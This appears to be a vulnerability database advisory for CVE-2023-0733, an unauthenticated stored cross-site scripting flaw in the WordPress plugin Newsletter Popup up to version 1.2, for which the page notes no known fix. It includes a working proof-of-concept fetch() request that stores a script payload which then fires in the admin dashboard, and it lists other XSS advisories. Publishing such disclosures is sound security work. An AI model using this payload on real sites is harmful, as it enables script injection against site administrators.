Newsletter Popup <= 1.2 – Unauthenticated Stored XSS | CVE 2023-0733 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some of its settings, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks

Proof of Concept

1. Create a Newsletter popup (any will do) and publish it.

2. Use an incognito window and open the website involved, then run the following code in the browser console (change URL accordingly): fetch('http://localhost/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=savenewsletter&nlid=1&nlname=Test&nldata=EMAIL%3Dalert(1)' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); 

3. Go to the WP-Admin dashboard, and Newsletter Popup -> Local Record, click on Show Record.

4. The alert will trigger successfully.

Affects Plugins

newsletter-popup

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

fed1e184-ff56-44fe-9876-d17c0156447a

Timeline

Publicly Published

2023-05-02 (about 2 years ago)

Added

2023-05-02 (about 2 years ago)

Last Updated

2023-05-02 (about 2 years ago)

Other

Published

Title

Published

2024-11-12

Title

Royal Elementor Addons and Template < 1.7.1002 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via Google Maps Widget

Published

2025-08-14

Title

CM On Demand Search And Replace < 1.5.3 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2022-06-15

Title

Core Plugin for Kitestudio Themes < 2.3.1 - Reflected Cross-Site-Scripting

Published

2017-10-12

Title

PopCash.Net Code Integration Tool <= 1.0 - Cross-Site Scripting (XSS)

Published

2024-06-20

Title

Appointment Booking and Online Scheduling < 4.4.3 - Reflected Cross-Site Scripting